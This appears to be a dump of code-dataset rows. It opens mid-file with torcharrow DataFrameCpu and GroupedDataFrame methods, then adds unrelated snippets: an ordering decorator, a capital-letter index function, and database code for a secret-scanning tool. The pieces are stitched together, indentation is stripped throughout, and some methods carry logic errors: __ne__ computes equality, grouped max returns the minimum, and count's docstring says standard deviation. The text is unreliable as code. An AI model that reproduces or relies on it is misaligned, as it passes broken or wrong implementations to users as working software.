self.dtype.fields[i].name: ColumnFromVelox.from_velox(
self.device,
self.dtype.fields[i].dtype,
self._data.child_at(i),
True,
)
/ other
for i in range(self._data.children_size())
},
self._mask,
)
@expression
def __rtruediv__(self, other):
if isinstance(other, DataFrameCpu):
return self._fromdata(
{n: other[n] / c for (n, c) in self._field_data.items()}
)
else:
return self._fromdata({n: other / c for (n, c) in self._field_data.items()})
@expression
def __mod__(self, other):
if isinstance(other, DataFrameCpu):
return self._fromdata(
{n: c % other[n] for (n, c) in self._field_data.items()}
)
else:
return self._fromdata(
{
self.dtype.fields[i].name: ColumnFromVelox.from_velox(
self.device,
self.dtype.fields[i].dtype,
self._data.child_at(i),
True,
)
% other
for i in range(self._data.children_size())
},
self._mask,
)
@expression
def __rmod__(self, other):
if isinstance(other, DataFrameCpu):
return self._fromdata(
{n: other[n] % c for (n, c) in self._field_data.items()}
)
else:
return self._fromdata({n: other % c for (n, c) in self._field_data.items()})
@expression
def __pow__(self, other):
if isinstance(other, DataFrameCpu):
assert len(self) == len(other)
return self._fromdata(
{
self.dtype.fields[i].name: ColumnFromVelox.from_velox(
self.device,
self.dtype.fields[i].dtype,
self._data.child_at(i),
True,
)
** ColumnFromVelox.from_velox(
other.device,
other.dtype.fields[i].dtype,
other._data.child_at(i),
True,
)
for i in range(self._data.children_size())
},
self._mask,
)
else:
return self._fromdata(
{
self.dtype.fields[i].name: ColumnFromVelox.from_velox(
self.device,
self.dtype.fields[i].dtype,
self._data.child_at(i),
True,
)
** other
for i in range(self._data.children_size())
},
self._mask,
)
@expression
def __rpow__(self, other):
if isinstance(other, DataFrameCpu):
assert len(self) == len(other)
return self._fromdata(
{
self.dtype.fields[i].name: ColumnFromVelox.from_velox(
other.device,
other.dtype.fields[i].dtype,
other._data.child_at(i),
True,
)
** ColumnFromVelox.from_velox(
self.device,
self.dtype.fields[i].dtype,
self._data.child_at(i),
True,
)
for i in range(self._data.children_size())
},
self._mask,
)
else:
return self._fromdata(
{
self.dtype.fields[i].name: other
** ColumnFromVelox.from_velox(
self.device,
self.dtype.fields[i].dtype,
self._data.child_at(i),
True,
)
for i in range(self._data.children_size())
},
self._mask,
)
@expression
def __eq__(self, other):
if isinstance(other, DataFrameCpu):
assert len(self) == len(other)
return self._fromdata(
{
self.dtype.fields[i].name: ColumnFromVelox.from_velox(
self.device,
self.dtype.fields[i].dtype,
self._data.child_at(i),
True,
)
== ColumnFromVelox.from_velox(
other.device,
other.dtype.fields[i].dtype,
other._data.child_at(i),
True,
)
for i in range(self._data.children_size())
},
self._mask,
)
else:
return self._fromdata(
{
self.dtype.fields[i].name: ColumnFromVelox.from_velox(
self.device,
self.dtype.fields[i].dtype,
self._data.child_at(i),
True,
)
== other
for i in range(self._data.children_size())
},
self._mask,
)
@expression
def __ne__(self, other):
if isinstance(other, DataFrameCpu):
return self._fromdata(
{n: c == other[n] for (n, c) in self._field_data.items()}
)
else:
return self._fromdata(
{n: c == other for (n, c) in self._field_data.items()}
)
@expression
def __lt__(self, other):
if isinstance(other, DataFrameCpu):
assert len(self) == len(other)
return self._fromdata(
{
self.dtype.fields[i].name: ColumnFromVelox.from_velox(
self.device,
self.dtype.fields[i].dtype,
self._data.child_at(i),
True,
)
< ColumnFromVelox.from_velox(
other.device,
other.dtype.fields[i].dtype,
other._data.child_at(i),
True,
)
for i in range(self._data.children_size())
},
self._mask,
)
else:
return self._fromdata(
{
self.dtype.fields[i].name: ColumnFromVelox.from_velox(
self.device,
self.dtype.fields[i].dtype,
self._data.child_at(i),
True,
)
< other
for i in range(self._data.children_size())
},
self._mask,
)
@expression
def __gt__(self, other):
if isinstance(other, DataFrameCpu):
assert len(self) == len(other)
return self._fromdata(
{
self.dtype.fields[i].name: ColumnFromVelox.from_velox(
self.device,
self.dtype.fields[i].dtype,
self._data.child_at(i),
True,
)
> ColumnFromVelox.from_velox(
other.device,
other.dtype.fields[i].dtype,
other._data.child_at(i),
True,
)
for i in range(self._data.children_size())
},
self._mask,
)
else:
return self._fromdata(
{
self.dtype.fields[i].name: ColumnFromVelox.from_velox(
self.device,
self.dtype.fields[i].dtype,
self._data.child_at(i),
True,
)
> other
for i in range(self._data.children_size())
},
self._mask,
)
def __le__(self, other):
if isinstance(other, DataFrameCpu):
return self._fromdata(
{n: c <= other[n] for (n, c) in self._field_data.items()}
)
else:
return self._fromdata(
{
self.dtype.fields[i].name: ColumnFromVelox.from_velox(
self.device,
self.dtype.fields[i].dtype,
self._data.child_at(i),
True,
)
<= other
for i in range(self._data.children_size())
},
self._mask,
)
def __ge__(self, other):
if isinstance(other, DataFrameCpu):
assert len(self) == len(other)
return self._fromdata(
{
self.dtype.fields[i].name: ColumnFromVelox.from_velox(
self.device,
self.dtype.fields[i].dtype,
self._data.child_at(i),
True,
)
>= ColumnFromVelox.from_velox(
other.device,
other.dtype.fields[i].dtype,
other._data.child_at(i),
True,
)
for i in range(self._data.children_size())
},
self._mask,
)
else:
return self._fromdata(
{n: c >= other for (n, c) in self._field_data.items()}
)
def __or__(self, other):
if isinstance(other, DataFrameCpu):
return self._fromdata(
{n: c | other[n] for (n, c) in self._field_data.items()}
)
else:
return self._fromdata(
{
self.dtype.fields[i].name: ColumnFromVelox.from_velox(
self.device,
self.dtype.fields[i].dtype,
self._data.child_at(i),
True,
)
| other
for i in range(self._data.children_size())
},
self._mask,
)
def __ror__(self, other):
if isinstance(other, DataFrameCpu):
return self._fromdata(
{n: other[n] | c for (n, c) in self._field_data.items()}
)
else:
return self._fromdata({n: other | c for (n, c) in self._field_data.items()})
def __and__(self, other):
if isinstance(other, DataFrameCpu):
return self._fromdata(
{n: c & other[n] for (n, c) in self._field_data.items()}
)
else:
return self._fromdata({n: c & other for (n, c) in self._field_data.items()})
def __rand__(self, other):
if isinstance(other, DataFrameCpu):
return self._fromdata(
{n: other[n] & c for (n, c) in self._field_data.items()}
)
else:
return self._fromdata({n: other & c for (n, c) in self._field_data.items()})
def __invert__(self):
return self._fromdata({n: ~c for (n, c) in self._field_data.items()})
def __neg__(self):
return self._fromdata(
{
self.dtype.fields[i].name: -ColumnFromVelox.from_velox(
self.device,
self.dtype.fields[i].dtype,
self._data.child_at(i),
True,
)
for i in range(self._data.children_size())
},
self._mask,
)
def __pos__(self):
return self._fromdata(
{
self.dtype.fields[i].name: ColumnFromVelox.from_velox(
self.device,
self.dtype.fields[i].dtype,
self._data.child_at(i),
True,
)
for i in range(self._data.children_size())
},
self._mask,
)
# isin ---------------------------------------------------------------
@trace
@expression
def isin(self, values: Union[list, dict, IColumn]):
"""Check whether values are contained in data."""
if isinstance(values, list):
return self._fromdata(
{
self.dtype.fields[i]
.name: ColumnFromVelox.from_velox(
self.device,
self.dtype.fields[i].dtype,
self._data.child_at(i),
True,
)
.isin(values)
for i in range(self._data.children_size())
},
self._mask,
)
if isinstance(values, dict):
self._check_columns(values.keys())
return self._fromdata(
{n: c.isin(values[n]) for n, c in self._field_data.items()}
)
if isinstance(values, IDataFrame):
self._check_columns(values.columns)
return self._fromdata(
{n: c.isin(values=list(values[n])) for n, c in self._field_data.items()}
)
else:
raise ValueError(
f"isin undefined for values of type {type(self).__name__}."
)
# data cleaning -----------------------------------------------------------
@trace
@expression
def fill_null(self, fill_value: Union[dt.ScalarTypes, Dict, Literal[None]]):
if fill_value is None:
return self
if isinstance(fill_value, IColumn._scalar_types):
return self._fromdata(
{
self.dtype.fields[i]
.name: ColumnFromVelox.from_velox(
self.device,
self.dtype.fields[i].dtype,
self._data.child_at(i),
True,
)
.fill_null(fill_value)
for i in range(self._data.children_size())
},
self._mask,
)
else:
raise TypeError(f"fill_null with {type(fill_value)} is not supported")
@trace
@expression
def drop_null(self, how: Literal["any", "all"] = "any"):
"""Return a dataframe with rows removed where the row has any or all nulls."""
# TODO only flat columns supported...
assert self._dtype is not None
res = Scope._EmptyColumn(self._dtype.constructor(nullable=False))
if how == "any":
for i in self:
if not self._has_any_null(i):
res._append(i)
elif how == "all":
for i in self:
if not self._has_all_null(i):
res._append(i)
return res._finalize()
@trace
@expression
def drop_duplicates(
self,
subset: Optional[List[str]] = None,
keep: Literal["first", "last", False] = "first",
):
"""Remove duplicate values from data but keep the first, last, none (keep=False)"""
columns = subset if subset is not None else self.columns
self._check_columns(columns)
# TODO fix slow implementation by vectorization,
# i.e do unique per column and delete when all agree
# shortcut once no match is found.
res = Scope._EmptyColumn(self.dtype)
indices = [self.columns.index(s) for s in columns]
seen = set()
for tup in self:
row = tuple(tup[i] for i in indices)
if row in seen:
continue
else:
seen.add(row)
res._append(tup)
return res._finalize()
# @staticmethod
def _has_any_null(self, tup) -> bool:
for t in tup:
if t is None:
return True
if isinstance(t, tuple) and self._has_any_null(t):
return True
return False
# @staticmethod
def _has_all_null(self, tup) -> bool:
for t in tup:
if t is not None:
return False
if isinstance(t, tuple) and not self._has_all_null(t):
return False
return True
# universal ---------------------------------------------------------
# TODO Decide on tracing level: If we trace 'min' om a
# - highlevel then we can use lambdas inside min
# - lowelevel, i.e call 'summarize', then lambdas have to become
# - global functions if they have no state
# - dataclasses with an apply function if they have state
@staticmethod
def _cmin(c):
return c.min
# with static function
@trace
@expression
def min(self):
"""Return the minimum of the non-null values of the Column."""
return self._summarize(DataFrameCpu._cmin)
# with dataclass function
# @expression
# def min(self, numeric_only=None):
# """Return the minimum of the non-null values of the Column."""
# return self._summarize(_Min(), {"numeric_only": numeric_only})
# with lambda
# @expression
# def min(self, numeric_only=None):
# """Return the minimum of the non-null values of the Column."""
# return self._summarize(lambda c: c.min, {"numeric_only": numeric_only})
@trace
@expression
def max(self):
"""Return the maximum of the non-null values of the column."""
# skipna == True
return self._summarize(lambda c: c.max)
@trace
@expression
def all(self):
"""Return whether all non-null elements are True in Column"""
return self._summarize(lambda c: c.all)
@trace
@expression
def any(self):
"""Return whether any non-null element is True in Column"""
return self._summarize(lambda c: c.any)
@trace
@expression
def sum(self):
"""Return sum of all non-null elements in Column"""
return self._summarize(lambda c: c.sum)
@trace
@expression
def prod(self):
"""Return produce of the values in the data"""
return self._summarize(lambda c: c.prod)
@trace
@expression
def cummin(self):
"""Return cumulative minimum of the data."""
return self._lift(lambda c: c.cummin)
@trace
@expression
def cummax(self):
"""Return cumulative maximum of the data."""
return self._lift(lambda c: c.cummax)
@trace
@expression
def cumsum(self):
"""Return cumulative sum of the data."""
return self._lift(lambda c: c.cumsum)
@trace
@expression
def cumprod(self):
"""Return cumulative product of the data."""
return self._lift(lambda c: c.cumprod)
@trace
@expression
def mean(self):
"""Return the mean of the values in the series."""
return self._summarize(lambda c: c.mean)
@trace
@expression
def median(self):
"""Return the median of the values in the data."""
return self._summarize(lambda c: c.median)
@trace
@expression
def mode(self):
"""Return the mode(s) of the data."""
return self._summarize(lambda c: c.mode)
@trace
@expression
def std(self):
"""Return the stddev(s) of the data."""
return self._summarize(lambda c: c.std)
@trace
@expression
def _nunique(self, drop_null=True):
"""Returns the number of unique values per column"""
res = {}
res["column"] = ta.Column([f.name for f in self.dtype.fields], dt.string)
res["unique"] = ta.Column(
[
ColumnFromVelox.from_velox(
self.device,
f.dtype,
self._data.child_at(self._data.type().get_child_idx(f.name)),
True,
)._nunique(drop_null)
for f in self.dtype.fields
],
dt.int64,
)
return self._fromdata(res, None)
def _summarize(self, func):
res = ta.Column(self.dtype)
for i in range(self._data.children_size()):
result = func(
ColumnFromVelox.from_velox(
self.device,
self.dtype.fields[i].dtype,
self._data.child_at(i),
True,
)
)()
if result is None:
res._data.child_at(i).append_null()
else:
res._data.child_at(i).append(result)
res._data.set_length(1)
return res
@trace
def _lift(self, func):
if self.null_count == 0:
res = velox.Column(get_velox_type(self.dtype))
for i in range(self._data.children_size()):
child = func(
ColumnFromVelox.from_velox(
self.device,
self.dtype.fields[i].dtype,
self._data.child_at(i),
True,
)
)()
res.set_child(
i,
child._data,
)
res.set_length(len(self._data))
return ColumnFromVelox.from_velox(self.device, self.dtype, res, True)
raise NotImplementedError("Dataframe row is not allowed to have nulls")
# describe ----------------------------------------------------------------
@trace
@expression
def describe(
self,
percentiles=None,
include_columns=None,
exclude_columns=None,
):
"""Generate descriptive statistics."""
# Not supported: datetime_is_numeric=False,
includes = []
if include_columns is None:
includes = [f.name for f in self.dtype.fields if dt.is_numerical(f.dtype)]
elif isinstance(include_columns, list):
includes = [f.name for f in self.dtype.fields if f.dtype in include_columns]
else:
raise TypeError(
f"describe with include_columns of type {type(include_columns).__name__} is not supported"
)
excludes = []
if exclude_columns is None:
excludes = []
elif isinstance(exclude_columns, list):
excludes = [f.name for f in self.dtype.fields if f.dtype in exclude_columns]
else:
raise TypeError(
f"describe with exclude_columns of type {type(exclude_columns).__name__} is not supported"
)
selected = [i for i in includes if i not in excludes]
if percentiles is None:
percentiles = [25, 50, 75]
percentiles = sorted(set(percentiles))
if len(percentiles) > 0:
if percentiles[0] < 0 or percentiles[-1] > 100:
raise ValueError("percentiles must be betwen 0 and 100")
res = {}
res["metric"] = ta.Column(
["count", "mean", "std", "min"] + [f"{p}%" for p in percentiles] + ["max"]
)
for s in selected:
idx = self._data.type().get_child_idx(s)
c = ColumnFromVelox.from_velox(
self.device,
self.dtype.fields[idx].dtype,
self._data.child_at(idx),
True,
)
res[s] = ta.Column(
[c._count(), c.mean(), c.std(), c.min()]
+ c.quantile(percentiles, "midpoint")
+ [c.max()]
)
return self._fromdata(res, [False] * len(res["metric"]))
# Dataframe specific ops -------------------------------------------------- #
@trace
@expression
def drop(self, columns: List[str]):
"""
Returns DataFrame without the removed columns.
"""
self._check_columns(columns)
return self._fromdata(
{
self.dtype.fields[i].name: ColumnFromVelox.from_velox(
self.device,
self.dtype.fields[i].dtype,
self._data.child_at(i),
True,
)
for i in range(self._data.children_size())
if self.dtype.fields[i].name not in columns
},
self._mask,
)
@trace
@expression
def keep(self, columns: List[str]):
"""
Returns DataFrame with the kept columns only.
"""
self._check_columns(columns)
return self._fromdata(
{
self.dtype.fields[i].name: ColumnFromVelox.from_velox(
self.device,
self.dtype.fields[i].dtype,
self._data.child_at(i),
True,
)
for i in range(self._data.children_size())
if self.dtype.fields[i].name in columns
},
self._mask,
)
@trace
@expression
def rename(self, column_mapper: Dict[str, str]):
self._check_columns(column_mapper.keys())
return self._fromdata(
{
column_mapper.get(
self.dtype.fields[i].name, self.dtype.fields[i].name
): ColumnFromVelox.from_velox(
self.device,
self.dtype.fields[i].dtype,
self._data.child_at(i),
True,
)
for i in range(self._data.children_size())
},
self._mask,
)
@trace
@expression
def reorder(self, columns: List[str]):
"""
Returns DataFrame with the columns in the prescribed order.
"""
self._check_columns(columns)
return self._fromdata(
{
col: ColumnFromVelox.from_velox(
self.device,
self.dtype.fields[self._data.type().get_child_idx(col)].dtype,
self._data.child_at(self._data.type().get_child_idx(col)),
True,
)
for col in columns
},
self._mask,
)
# interop ----------------------------------------------------------------
def to_pandas(self):
"""Convert self to pandas dataframe"""
# TODO Add type translation.
# Skipping analyzing 'pandas': found module but no type hints or library stubs
import pandas as pd # type: ignore
map = {}
for n, c in self._field_data.items():
map[n] = c.to_pandas()
return pd.DataFrame(map)
def to_arrow(self):
"""Convert self to arrow table"""
# TODO Add type translation
import pyarrow as pa # type: ignore
map = {}
for n, c in self._field_data.items():
map[n] = c.to_arrow()
return pa.table(map)
def to_torch(self):
pytorch.ensure_available()
import torch
# TODO: this actually puts the type annotations on the tuple wrong.
# We might need to address it eventually, but because it's Python it doesn't matter
tup_type = self._dtype.py_type
return tup_type(*(self[f.name].to_torch() for f in self.dtype.fields))
# fluent with symbolic expressions ----------------------------------------
# TODO decide on whether we nat to have arbitrarily nested wheres...
@trace
@expression
def where(self, *conditions):
"""
Analogous to SQL's where (NOT Pandas where)
Filter a dataframe to only include rows satisfying a given set
of conditions. df.where(p) is equivalent to writing df[p].
Examples
--------
>>> from torcharrow import ta
>>> xf = ta.DataFrame({
>>> 'A':['a', 'b', 'a', 'b'],
>>> 'B': [1, 2, 3, 4],
>>> 'C': [10,11,12,13]})
>>> xf.where(xf['B']>2)
index A B C
------- --- --- ---
0 a 3 12
1 b 4 13
dtype: Struct([Field('A', string), Field('B', int64), Field('C', int64)]), count: 2, null_count: 0
When referring to self in an expression, the special value `me` can be
used.
>>> from torcharrow import me
>>> xf.where(me['B']>2)
index A B C
------- --- --- ---
0 a 3 12
1 b 4 13
dtype: Struct([Field('A', string), Field('B', int64), Field('C', int64)]), count: 2, null_count: 0
"""
if len(conditions) == 0:
return self
values = []
for i, condition in enumerate(conditions):
value = eval_expression(condition, {"me": self})
values.append(value)
reduced_values = functools.reduce(lambda x, y: x & y, values)
return self[reduced_values]
@trace
@expression
def select(self, *args, **kwargs):
"""
Analogous to SQL's ``SELECT`.
Transform a dataframe by selecting old columns and new (computed)
columns.
args - positional string arguments
Column names to keep in the projection. A column name of "*" is a
shortcut to denote all columns. A column name beginning with "-"
means remove this column.
kwargs - named value arguments
New column name expressions to add to the projection
The special symbol me can be used to refer to self.
Examples
--------
>>> from torcharrow import ta
>>> xf = ta.DataFrame({
>>> 'A': ['a', 'b', 'a', 'b'],
>>> 'B': [1, 2, 3, 4],
>>> 'C': [10,11,12,13]})
>>> xf.select(*xf.columns,D=me['B']+me['C'])
index A B C D
------- --- --- --- ---
0 a 1 10 11
1 b 2 11 13
2 a 3 12 15
3 b 4 13 17
dtype: Struct([Field('A', string), Field('B', int64), Field('C', int64), Field('D', int64)]), count: 4, null_count: 0
Using '*' and '-colname':
>>> xf.select('*','-B',D=me['B']+me['C'])
index A C D
------- --- --- ---
0 a 10 11
1 b 11 13
2 a 12 15
3 b 13 17
dtype: Struct([Field('A', string), Field('C', int64), Field('D', int64)]), count: 4, null_count: 0
"""
input_columns = set(self.columns)
has_star = False
include_columns = []
exclude_columns = []
for arg in args:
if not isinstance(arg, str):
raise TypeError("args must be column names")
if arg == "*":
if has_star:
raise ValueError("select received repeated stars")
has_star = True
elif arg in input_columns:
if arg in include_columns:
raise ValueError(
f"select received a repeated column-include ({arg})"
)
include_columns.append(arg)
elif arg[0] == "-" and arg[1:] in input_columns:
if arg in exclude_columns:
raise ValueError(
f"select received a repeated column-exclude ({arg[1:]})"
)
exclude_columns.append(arg[1:])
else:
raise ValueError(f"argument ({arg}) does not denote an existing column")
if exclude_columns and not has_star:
raise ValueError("select received column-exclude without a star")
if has_star and include_columns:
raise ValueError("select received both a star and column-includes")
if set(include_columns) & set(exclude_columns):
raise ValueError(
"select received overlapping column-includes and " + "column-excludes"
)
include_columns_inc_star = self.columns if has_star else include_columns
output_columns = [
col for col in include_columns_inc_star if col not in exclude_columns
]
res = {}
for i in range(self._data.children_size()):
n = self.dtype.fields[i].name
if n in output_columns:
res[n] = ColumnFromVelox.from_velox(
self.device,
self.dtype.fields[i].dtype,
self._data.child_at(i),
True,
)
for n, c in kwargs.items():
res[n] = eval_expression(c, {"me": self})
return self._fromdata(res, self._mask)
@trace
@expression
def pipe(self, func, *args, **kwargs):
"""
Apply func(self, *args, **kwargs).
"""
return func(self, *args, **kwargs)
@trace
@expression
def groupby(
self,
by: List[str],
sort=False,
drop_null=True,
):
"""
SQL like data grouping, supporting split-apply-combine paradigm.
Parameters
----------
by - list of strings
List of column names to group by.
sort - bool
Whether the groups are in sorted order.
drop_null - bool
Whether NULL/NaNs in group keys are dropped.
Examples
--------
>>> import torcharrow as ta
>>> df = ta.DataFrame({'A': ['a', 'b', 'a', 'b'], 'B': [1, 2, 3, 4]})
>>> # group by A
>>> grouped = df.groupby(['A'])
>>> # apply sum on each of B's grouped column to create a new column
>>> grouped_sum = grouped['B'].sum()
>>> # combine a new dataframe from old and new columns
>>> res = ta.DataFrame()
>>> res['A'] = grouped['A']
>>> res['B.sum'] = grouped_sum
>>> res
index A B.sum
------- --- -------
0 a 4
1 b 6
dtype: Struct([Field('A', string), Field('B.sum', int64)]), count: 2, null_count: 0
The same as above, as a one-liner:
>>> df.groupby(['A']).sum()
index A B.sum
------- --- -------
0 a 4
1 b 6
dtype: Struct([Field('A', string), Field('B.sum', int64)]), count: 2, null_count: 0
To apply multiple aggregate functions to different parts of the
dataframe, use groupby followed by select.
>>> df = ta.DataFrame({
>>> 'A':['a', 'b', 'a', 'b'],
>>> 'B': [1, 2, 3, 4],
>>> 'C': [10,11,12,13]})
>>> df.groupby(['A']).select(b_sum=me['B'].sum(), c_count=me['C'].count())
index A b_sum c_count
------- --- ------- ---------
0 a 4 2
1 b 6 2
dtype: Struct([Field('A', string), Field('b_sum', int64), Field('c_count', int64)]), count: 2, null_count: 0
To see what data groups contain:
>>> for g, df in grouped:
print(g)
print(" ", df)
('a',)
self._fromdata({'B':Column([1, 3], id = c129), id = c130})
('b',)
self._fromdata({'B':Column([2, 4], id = c131), id = c132})
"""
# TODO implement
assert not sort
assert drop_null
self._check_columns(by)
key_columns = by
key_fields = []
item_fields = []
for k in key_columns:
key_fields.append(dt.Field(k, self.dtype.get(k)))
for f in self.dtype.fields:
if f.name not in key_columns:
item_fields.append(f)
groups: Dict[Tuple, ar.array] = {}
for i in range(len(self)):
if self.is_valid_at(i):
key = tuple(
self._data.child_at(self._data.type().get_child_idx(f.name))[i]
for f in key_fields
)
if key not in groups:
groups[key] = ar.array("I")
df = groups[key]
df.append(i)
else:
pass
return GroupedDataFrame(key_fields, item_fields, groups, self)
@dataclass
class GroupedDataFrame:
_key_fields: List[dt.Field]
_item_fields: List[dt.Field]
_groups: Mapping[Tuple, Sequence]
_parent: DataFrameCpu
@property
def _scope(self):
return self._parent._scope
@property # type: ignore
@traceproperty
def size(self):
"""
Return the size of each group (including nulls).
"""
res = {
f.name: ta.Column([v[idx] for v, _ in self._groups.items()], f.dtype)
for idx, f in enumerate(self._key_fields)
}
res["size"] = ta.Column([len(c) for _, c in self._groups.items()], dt.int64)
return self._parent._fromdata(res, None)
def __iter__(self):
"""
Yield pairs of grouped tuple and the grouped dataframe
"""
for g, xs in self._groups.items():
dtype = dt.Struct(self._item_fields)
df = ta.Column(dtype).append(
tuple(
tuple(
self._parent._data.child_at(
self._parent._data.type().get_child_idx(f.name)
)[x]
for f in self._item_fields
)
for x in xs
)
)
yield g, df
@trace
def _lift(self, op: str) -> IColumn:
if len(self._key_fields) > 0:
# it is a dataframe operation:
return self._combine(op)
elif len(self._item_fields) == 1:
return self._apply1(self._item_fields[0], op)
raise AssertionError("unexpected case")
def _combine(self, op: str):
agg_fields = [dt.Field(f"{f.name}.{op}", f.dtype) for f in self._item_fields]
res = {}
for f, c in zip(self._key_fields, self._unzip_group_keys()):
res[f.name] = c
for f, c in zip(agg_fields, self._apply(op)):
res[f.name] = c
return self._parent._fromdata(res, None)
def _apply(self, op: str) -> List[IColumn]:
cols = []
for f in self._item_fields:
cols.append(self._apply1(f, op))
return cols
def _apply1(self, f: dt.Field, op: str) -> IColumn:
src_t = f.dtype
dest_f, dest_t = dt.get_agg_op(op, src_t)
res = Scope._EmptyColumn(dest_t)
src_c = self._parent._data.child_at(
self._parent._data.type().get_child_idx(f.name)
)
for g, xs in self._groups.items():
dest_data = [src_c[x] for x in xs]
dest_c = dest_f(ta.Column(dest_data, dtype=dest_t))
res._append(dest_c)
return res._finalize()
def _unzip_group_keys(self) -> List[IColumn]:
cols = []
for f in self._key_fields:
cols.append(Scope._EmptyColumn(f.dtype))
for tup in self._groups.keys():
for i, t in enumerate(tup):
cols[i]._append(t)
return [col._finalize() for col in cols]
def __contains__(self, key: str):
for f in self._item_fields:
if f.name == key:
return True
for f in self._key_fields:
if f.name == key:
return True
return False
def __getitem__(self, arg):
"""
Return the named grouped column
"""
# TODO extend that this works inside struct frames as well,
# e.g. grouped['a']['b'] where grouped returns a struct column having 'b' as field
if isinstance(arg, str):
for f in self._item_fields:
if f.name == arg:
return GroupedDataFrame([], [f], self._groups, self._parent)
for i, f in enumerate(self._key_fields):
if f.name == arg:
res = Scope._EmptyColumn(f.dtype)
for tup in self._groups.keys():
res._append(tup[i])
return res._finalize()
raise ValueError(f"no column named ({arg}) in grouped dataframe")
raise TypeError(f"unexpected type for arg ({type(arg).__name})")
def min(self, numeric_only=None):
"""Return the minimum of the non-null values of the Column."""
assert numeric_only == None
return self._lift("min")
def max(self, numeric_only=None):
"""Return the minimum of the non-null values of the Column."""
assert numeric_only == None
return self._lift("min")
def all(self, boolean_only=None):
"""Return whether all non-null elements are True in Column"""
# skipna == True
return self._lift("all")
def any(self, skipna=True, boolean_only=None):
"""Return whether any non-null element is True in Column"""
# skipna == True
return self._lift("any")
def sum(self):
"""Return sum of all non-null elements in Column"""
# skipna == True
# only_numerical == True
# skipna == True
return self._lift("sum")
def prod(self):
"""Return produce of the values in the data"""
# skipna == True
# only_numerical == True
return self._lift("prod")
def mean(self):
"""Return the mean of the values in the series."""
return self._lift("mean")
def median(self):
"""Return the median of the values in the data."""
return self._lift("median")
def mode(self):
"""Return the mode(s) of the data."""
return self._lift("mode")
def std(self):
"""Return the stddev(s) of the data."""
return self._lift("std")
def count(self):
"""Return the stddev(s) of the data."""
return self._lift("count")
# TODO should add reduce here as well...
@trace
def agg(self, arg):
"""
Apply aggregation(s) to the groups.
"""
# DataFrame{'a': [1, 1, 2], 'b': [1, 2, 3], 'c': [2, 2, 1]})
# a.groupby('a').agg('sum') -- applied on rest
# a.groupby('a').agg(['sum', 'min']) -- both applied on rest
# a.groupby('a').agg({'b': ['min', 'mean']}) -- applied on
# TODO
# a.groupby('a').aggregate( a= me['a'].mean(), b_min =me['b'].min(), b_mean=me['c'].mean()))
# f1 = lambda x: x.quantile(0.5); f1.__name__ = "q0.5"
# f2 = lambda x: x.quantile(0.75); f2.__name__ = "q0.75"
# a.groupby('a').agg([f1, f2])
res = {}
for f, c in zip(self._key_fields, self._unzip_group_keys()):
res[f.name] = c
for agg_name, field, op in self._normalize_agg_arg(arg):
res[agg_name] = self._apply1(field, op)
return self._parent._fromdata(res, None)
def aggregate(self, arg):
"""
Apply aggregation(s) to the groups.
"""
return self.agg(arg)
@trace
def select(self, **kwargs):
"""
Like select for dataframes, except for groups
"""
res = {}
for f, c in zip(self._key_fields, self._unzip_group_keys()):
res[f.name] = c
for n, c in kwargs.items():
res[n] = eval_expression(c, {"me": self})
return self._parent._fromdata(res)
def _normalize_agg_arg(self, arg):
res = [] # triple name, field, op
if isinstance(arg, str):
# normalize
arg = [arg]
if isinstance(arg, list):
for op in arg:
for f in self._item_fields:
res.append((f"{f.name}.{op}", f, op))
elif isinstance(arg, dict):
for n, ops in arg.items():
fields = [f for f in self._item_fields if f.name == n]
if len(fields) == 0:
raise ValueError(f"column ({n}) does not exist")
# TODO handle duplicate columns, if ever...
assert len(fields) == 1
if isinstance(ops, str):
ops = [ops]
for op in ops:
res.append((f"{n}.{op}", fields[0], op))
else:
raise TypeError(f"unexpected arg type ({type(arg).__name__})")
return res
# ------------------------------------------------------------------------------
# registering the factory
Dispatcher.register((dt.Struct.typecode + "_empty", "cpu"), DataFrameCpu._empty)
Dispatcher.register((dt.Struct.typecode + "_full", "cpu"), DataFrameCpu._full)
Dispatcher.register((dt.Struct.typecode + "_fromlist", "cpu"), DataFrameCpu._fromlist)
# ------------------------------------------------------------------------------
# DataFrame var (is here and not in Expression) to break cyclic import dependency
# ------------------------------------------------------------------------------
# Relational operators, still TBD
# def join(
# self,
# other,
# on=None,
# how="left",
# lsuffix="",
# rsuffix="",
# sort=False,
# method="hash",
# ):
# """Join columns with other DataFrame on index or on a key column."""
# def rolling(
# self, window, min_periods=None, center=False, axis=0, win_type=None
# ):
# return Rolling(
# self,
# window,
# min_periods=min_periods,
# center=center,
# axis=axis,
# win_type=win_type,
# )
#
# all set operations: union, uniondistinct, except, etc.
|
986,924 | ff121508fee09e093a5044dc55c2a65892945acf | from typing import Any, Optional, Union
from executor.meta.env_var import must_extract_env_var
from executor.meta.meta import set_meta_information, has_meta_information, get_meta_information
__order_key = "order"
def has_order(obj: Any) -> bool:
return has_meta_information(obj, __order_key)
def get_order(obj: Any) -> Optional[int]:
return get_meta_information(obj, __order_key)
def order(value: Union[int, str]):
def __decorator(func):
if isinstance(value, int):
set_meta_information(func, __order_key, value)
else:
set_meta_information(func, __order_key, int(must_extract_env_var(value)))
return func
return __decorator
|
986,925 | 7fc156f7b96cc2742effd447b5872df6148bbffc | def index_of_caps(word):
idxs = []
for idx, letter in enumerate(word):
if letter.isupper():
idxs.append(idx)
return idxs
print(index_of_caps("aLoR")) |
986,926 | 49a7a3fe71dd8c8470da2b0f5792ec728ef22254 | from datetime import datetime, timezone
from typing import List
from sqlalchemy.sql import and_, or_, select
from raddar.db.database import analysis, database, project, secret
from raddar.lib.managers.repository_manager import get_branch_name
from raddar.models import models
from raddar.schemas import schemas
async def create_analysis_secret(
secret_to_create: schemas.SecretBase, analysis_id: int
):
query = secret.insert(None).values(
**secret_to_create.dict(), analysis_id=analysis_id
)
return await database.execute(query=query)
async def create_project(project_to_create: schemas.ProjectBase):
query = project.insert(None).values(**project_to_create.dict())
return await database.execute(query=query)
async def create_analysis(
project_id: int,
analysis_to_create: schemas.AnalysisBase,
ref_name: str,
scan_origin: models.ScanOrigin,
secrets_to_create: List[schemas.SecretBase],
):
now = datetime.now(timezone.utc)
query = analysis.insert(None).values(
execution_date=now,
branch_name=get_branch_name(analysis_to_create.branch_name),
ref_name=ref_name,
scan_origin=scan_origin,
project_id=project_id,
)
analysis_returned_id = await database.execute(query=query)
secrets_returned = []
for secret_to_create in secrets_to_create:
secret_returned_id = await create_analysis_secret(
secret_to_create, analysis_returned_id
)
secrets_returned.append({**secret_to_create.dict(), "id": secret_returned_id})
return {
**analysis_to_create.dict(),
"id": analysis_returned_id,
"execution_date": now,
"ref_name": ref_name,
"scan_origin": scan_origin,
"project_id": project_id,
"secrets": secrets_to_create,
}
